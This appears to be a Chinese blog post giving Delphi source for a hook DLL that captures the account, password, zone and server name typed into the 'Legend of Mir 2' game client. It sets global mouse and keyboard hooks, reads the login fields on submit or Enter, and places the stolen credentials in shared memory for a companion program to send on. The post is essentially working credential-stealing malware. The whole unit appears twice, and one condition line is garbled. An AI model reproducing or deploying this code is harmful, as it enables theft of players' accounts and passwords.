该代码段展示了用于获取传奇客户端中账号、密码和服务器名称的Hook技术。通过枚举子窗体、设置鼠标和键盘钩子,实现了在特定控件上监听用户输入,从而提取关键信息,并将数据写入共享内存进行传递。
获取“
传奇
”密码、区域、服务器的主要
代码
unit unitHook;
interface
……
function EnableHook:Boolean;stdcall //有效钩子程序
function DisableHook:Boolean;stdcall; //无效钩子程序
……
implementation
……
//列举子窗体的回调函数
function EnumChildWindowsProc(hChild: HWnd): Boolean; stdcall;
var
szClassName: array[0..255] of char;
begin
Result := True; //设定为True才会再找下一个
GetClassName(hChild, szClassName, 255);
if StrPas(szClassName)='TEdit' then begin
inc(numEdit);
if numEdit=1 then
hEdit2:= hChild //密码
else if numEdit=2 then
hEdit1:= hChild //账号
end;
end;
//取密码
procedure GetPassword;
var
ss,ID,PW:string;
begin
numEdit:=0;//识别TEdit控件数量
EnumChildWindows(hActiv, @EnumChildWindowsProc, 0);//列举控件
if numEdit=2 then begin
ID:=trim(GetCaption(hEdit1));
PW:=trim(GetCaption(hEdit2));
if (ID<>'')and(PW<>'') then begin
nNext:=3;
ss:=Format('账号=%s,密码=%s',[ID,PW])+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now);
StrCopy(@pShMem^.Text,PChar(ss));
PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知
end;
end;
end;
//取服务器名
procedure GetServerName;
const
x1=310;x2=477;
y1=144;
d=3; //服务器名按钮间隔
step=42; //服务器名按钮步长
var
P : TPoint;
yy, n1, n2 : integer;
IniFileName, Ident, ss : string;
begin
GetCursorPos(P); //获取当前鼠标的坐标
if (p.Xx2) or (p.Y
yy:=p.Y-y1;
n1:=yy div step;
n2:=(yy+d) div step;
if n1=n2 then inc(n1)
else n1:=0;
if n1=0 then exit; //鼠标点击不在服务器名上
IniFileName:=ExtractFilePath(ParamStr(0))+'ftp.ini';
Ident:='server'+IntToStr(n1)+'caption';
ss:=ReadStringFromIniFile(IniFileName,Ident);
if ss<>'' then begin
ss:=ss+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now);
StrCopy(@pShMem^.Text,PChar('服务器='+ss));
//PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知
PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 10, 2); //通知取信息,并反馈发送
end;
end;
//鼠标钩子过程,由判断鼠标的动作来决定writetotxt
//参数分别是钩子代码,wParam鼠标消息号,lParam指向一个MOUSEHOOKSTRUCT (包含了有关鼠标事件的信息)
function MouseHookPro(iCode:integer; wParam:wparam; lParam:lparam): LResult;stdcall;export;
var
hControl : HWND;
WinClass, WinText, ss : string;
P:TPoint;
rcWin:TRect;
begin
if (iCode=HC_ACTION) and (wParam=WM_LBUTTONUP) then begin//如果是鼠标单击的消息
hActiv:=GetActiveWindow;
WinClass:=GetClass(hActiv);
if Uppercase(WinClass)='TFRMMAIN' then begin
WinText:=GetCaption(hActiv);
if WinText='传奇客户端' then begin
hControl:=FindWindowEx(hActiv,0,'TComboBox',nil);
if hControl<>0 then begin //是区号选择窗口
GetWindowRect(hActiv,rcWin);
P.X:= PMouseHookStruct(lParam)^.pt.X - rcWin.Left;
P.Y:= PMouseHookStruct(lParam)^.pt.Y - rcWin.Top;
if(P.X>=200)and(P.X<=280)and(P.Y>=348)and(P.Y<=380)then begin//“确认”按钮
ss:='区号='+GetCaption(hControl)+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now);
StrCopy(@pShMem^.Text,PChar(ss));
PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知
end;
end;
end else if WinText='legend of mir2' then begin
if nNext=3 then begin
GetServerName; //取服务器名,与下段先后顺序不能颠倒
nNext:=0;
end;
P:=PMouseHookStruct(lParam)^.pt;
if(P.X>=421)and(P.X<=501)and(P.Y>=336)and(P.Y<=371)then //[提交]按钮
GetPassword; //取密码,与上段先后顺序不能颠倒
end;
end;
end;
Result:=CallNextHookEx(mousehook,iCode,wParam,lParam);
end;
//键盘hook,wParam 键ASCII码
function KeyboardHookPro(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
var
WinClass, WinText : string;
begin
if (iCode=HC_ACTION) and
((lParam and $80000000)=0) and //$80000000键盘掩码常量
(wParam=$0D) then begin //$0D回车键
hActiv:=GetActiveWindow;
WinClass:=GetClass(hActiv);
WinText:=GetCaption(hActiv);
if (Uppercase(WinClass)='TFRMMAIN')and(WinText='legend of mir2') then begin
GetPassword;//取密码
end;
end;
Result := CallNextHookEx(keyboardhook, iCode, wParam, lParam);
end;
//有效钩子程序
function EnableHook:boolean;stdcall;export;
begin
if mousehook=0 then
mousehook:=SetWindowsHookEx(wh_mouse,MouseHookPro,HInstance,0);//鼠标钩子
if keyboardhook=0 then
keyboardhook:=SetWindowsHookEx(wh_keyboard,KeyboardHookPro, hinstance,0);//键盘钩子
Result:=(mousehook<>0)and(keyboardhook<>0);
end;
//无效钩子程序
function DisableHook:boolean;stdcall;export;
begin
if mousehook<>0 then
if UnHookWindowsHookEx(mousehook) then mousehook:=0;//鼠标钩子
if keyboardhook<>0 then
if UnHookWindowsHookEx(keyboardhook) then keyboardhook:=0;//键盘钩子
Result:=(mousehook=0)and(keyboardhook=0);
end;
initialization
hMappingFile := OpenFileMapping(FILE_MAP_WRITE, False, MappingFileName);
if hMappingFile = 0 then
hMappingFile := CreateFileMapping($FFFFFFFF, nil,PAGE_READWRITE, 0,
SizeOf(TShareMem), PChar(MappingFileName));
if hMappingFile <> 0 then begin
pShMem := PShareMem(MapViewOfFile(hMappingFile,FILE_MAP_WRITE,0,0,0));
if pShMem = nil then begin
CloseHandle(hMappingFile);
MessageBox(0,'不能建立共享内存!','',0);
exit;
end;
end;
mousehook:=0;
keyboardhook:=0;
nNext:=0;
finalization
UnMapViewOfFile(pShMem);
CloseHandle(hMappingFile);
end.
unit unitHook;
interface
……
function EnableHook:Boolean;stdcall //有效钩子程序
function DisableHook:Boolean;stdcall; //无效钩子程序
……
implementation
……
//列举子窗体的回调函数
function EnumChildWindowsProc(hChild: HWnd): Boolean; stdcall;
var
szClassName: array[0..255] of char;
begin
Result := True; //设定为True才会再找下一个
GetClassName(hChild, szClassName, 255);
if StrPas(szClassName)='TEdit' then begin
inc(numEdit);
if numEdit=1 then
hEdit2:= hChild //密码
else if numEdit=2 then
hEdit1:= hChild //账号
end;
end;
//取密码
procedure GetPassword;
var
ss,ID,PW:string;
begin
numEdit:=0;//识别TEdit控件数量
EnumChildWindows(hActiv, @EnumChildWindowsProc, 0);//列举控件
if numEdit=2 then begin
ID:=trim(GetCaption(hEdit1));
PW:=trim(GetCaption(hEdit2));
if (ID<>'')and(PW<>'') then begin
nNext:=3;
ss:=Format('账号=%s,密码=%s',[ID,PW])+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now);
StrCopy(@pShMem^.Text,PChar(ss));
PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知
end;
end;
end;
//取服务器名
procedure GetServerName;
const
x1=310;x2=477;
y1=144;
d=3; //服务器名按钮间隔
step=42; //服务器名按钮步长
var
P : TPoint;
yy, n1, n2 : integer;
IniFileName, Ident, ss : string;
begin
GetCursorPos(P); //获取当前鼠标的坐标
if (p.Xx2) or (p.Y
yy:=p.Y-y1;
n1:=yy div step;
n2:=(yy+d) div step;
if n1=n2 then inc(n1)
else n1:=0;
if n1=0 then exit; //鼠标点击不在服务器名上
IniFileName:=ExtractFilePath(ParamStr(0))+'ftp.ini';
Ident:='server'+IntToStr(n1)+'caption';
ss:=ReadStringFromIniFile(IniFileName,Ident);
if ss<>'' then begin
ss:=ss+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now);
StrCopy(@pShMem^.Text,PChar('服务器='+ss));
//PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知
PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 10, 2); //通知取信息,并反馈发送
end;
end;
//鼠标钩子过程,由判断鼠标的动作来决定writetotxt
//参数分别是钩子代码,wParam鼠标消息号,lParam指向一个MOUSEHOOKSTRUCT (包含了有关鼠标事件的信息)
function MouseHookPro(iCode:integer; wParam:wparam; lParam:lparam): LResult;stdcall;export;
var
hControl : HWND;
WinClass, WinText, ss : string;
P:TPoint;
rcWin:TRect;
begin
if (iCode=HC_ACTION) and (wParam=WM_LBUTTONUP) then begin//如果是鼠标单击的消息
hActiv:=GetActiveWindow;
WinClass:=GetClass(hActiv);
if Uppercase(WinClass)='TFRMMAIN' then begin
WinText:=GetCaption(hActiv);
if WinText='传奇客户端' then begin
hControl:=FindWindowEx(hActiv,0,'TComboBox',nil);
if hControl<>0 then begin //是区号选择窗口
GetWindowRect(hActiv,rcWin);
P.X:= PMouseHookStruct(lParam)^.pt.X - rcWin.Left;
P.Y:= PMouseHookStruct(lParam)^.pt.Y - rcWin.Top;
if(P.X>=200)and(P.X<=280)and(P.Y>=348)and(P.Y<=380)then begin//“确认”按钮
ss:='区号='+GetCaption(hControl)+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now);
StrCopy(@pShMem^.Text,PChar(ss));
PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知
end;
end;
end else if WinText='legend of mir2' then begin
if nNext=3 then begin
GetServerName; //取服务器名,与下段先后顺序不能颠倒
nNext:=0;
end;
P:=PMouseHookStruct(lParam)^.pt;
if(P.X>=421)and(P.X<=501)and(P.Y>=336)and(P.Y<=371)then //[提交]按钮
GetPassword; //取密码,与上段先后顺序不能颠倒
end;
end;
end;
Result:=CallNextHookEx(mousehook,iCode,wParam,lParam);
end;
//键盘hook,wParam 键ASCII码
function KeyboardHookPro(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
var
WinClass, WinText : string;
begin
if (iCode=HC_ACTION) and
((lParam and $80000000)=0) and //$80000000键盘掩码常量
(wParam=$0D) then begin //$0D回车键
hActiv:=GetActiveWindow;
WinClass:=GetClass(hActiv);
WinText:=GetCaption(hActiv);
if (Uppercase(WinClass)='TFRMMAIN')and(WinText='legend of mir2') then begin
GetPassword;//取密码
end;
end;
Result := CallNextHookEx(keyboardhook, iCode, wParam, lParam);
end;
//有效钩子程序
function EnableHook:boolean;stdcall;export;
begin
if mousehook=0 then
mousehook:=SetWindowsHookEx(wh_mouse,MouseHookPro,HInstance,0);//鼠标钩子
if keyboardhook=0 then
keyboardhook:=SetWindowsHookEx(wh_keyboard,KeyboardHookPro, hinstance,0);//键盘钩子
Result:=(mousehook<>0)and(keyboardhook<>0);
end;
//无效钩子程序
function DisableHook:boolean;stdcall;export;
begin
if mousehook<>0 then
if UnHookWindowsHookEx(mousehook) then mousehook:=0;//鼠标钩子
if keyboardhook<>0 then
if UnHookWindowsHookEx(keyboardhook) then keyboardhook:=0;//键盘钩子
Result:=(mousehook=0)and(keyboardhook=0);
end;
initialization
hMappingFile := OpenFileMapping(FILE_MAP_WRITE, False, MappingFileName);
if hMappingFile = 0 then
hMappingFile := CreateFileMapping($FFFFFFFF, nil,PAGE_READWRITE, 0,
SizeOf(TShareMem), PChar(MappingFileName));
if hMappingFile <> 0 then begin
pShMem := PShareMem(MapViewOfFile(hMappingFile,FILE_MAP_WRITE,0,0,0));
if pShMem = nil then begin
CloseHandle(hMappingFile);
MessageBox(0,'不能建立共享内存!','',0);
exit;
end;
end;
mousehook:=0;
keyboardhook:=0;
nNext:=0;
finalization
UnMapViewOfFile(pShMem);
CloseHandle(hMappingFile);
end.
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
